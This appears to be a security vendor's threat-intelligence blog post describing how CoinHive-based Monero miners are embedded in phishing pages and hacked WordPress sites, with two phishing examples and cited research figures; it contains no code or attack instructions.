Bitcoin and most other cryptocurrencies are based on the idea that coins can be generated by causing computers to solve a difficult problem. The more CPU cycles an individual can dedicate towards the mining problem, the more likely the chance that they will create a new coin. For years, botnets have scanned corporate networks for high-powered machines and installed Bitcoin or other cryptocurrency mining software on the fastest computers. We’ve seen a wide variety of methods for infecting people with cryptocurrency miners, with Monero miners being launched as stand-alone malicious executables since June 2017 after users unwittingly open a malicious Word document attached to an email message, causing the Monero-mining executable to be downloaded from the Internet and launched.
More recently, the news has been riddled recently with stories about a particular Monero mining software that runs in a browser. The site most commonly associated with this behavior is CoinHive. The level of exploitation is such that recently CheckPoint Software said that CoinHive Miners were their “Most Wanted” malware, with at 55% of their customers having been exposed to one or more cryptocurrency mining malware families.
We know from experience that many email recipients, even if they believe an email is likely to be a phish, will still click on it simply because they are curious. Many believe that if it is a phish, they will be smart enough to recognize it once they see the page and “not fall for it.”
The growing trend now is to embed the miner into more traditional credential-phishing sites, where an email lures users to a fake website designed to steal the userid and password to an online service, email system, or financial institution. When this approach is used, popular browsers launch instances of themselves which are hidden from the user, allowing coin-mining to continue in the background even if the user has closed all of the browser windows he or she can see.
Figure 1 – An Alibaba Phish – PhishMe Threat ID: 26007111
When your employees click on ANY URL, especially if that website happens to be a vulnerable WordPress site, they may be exposed to a crypto-currency miner. In the next example, we believe the DocuSign phisher, who has previously created at least forty other phishing sites, did not intend to cause visitors to mine for cryptocurrency. Instead, the site he hacked, via a WordPress vulnerability, had also been hacked by someone installing a CoinHive-based Monero Miner.
Figure 2 – Docusign Phish (email credential stealer) – PhishMe ThreatID 25865106
Although the phisher did not include the CoinHive code, the WordPress site which was hacked by the phisher to host his DocuSign phish was ALSO hacked to install a CoinHive-based Monero miner in such a way that every visitor to the site began to mine Monero. Although Sucuri reported back in September that CoinHive miners had been seen on hacked websites, it was not until late December 2017 that we saw massive exploitation of WordPress sites to install CoinHive Miners, as documented by BleepingComputer. This attack was quite successful, earning the hackers at least $100,000 worth of Monero in just two of the Monero wallet addresses observed by security researchers. Other researchers have also reported wide delivery of this malware, including Malwarebytes, who says they block CoinHive related API calls as many as 8 million times per day!
Sign up for free threat alerts from Cofense Intelligence™ and Cofense Research.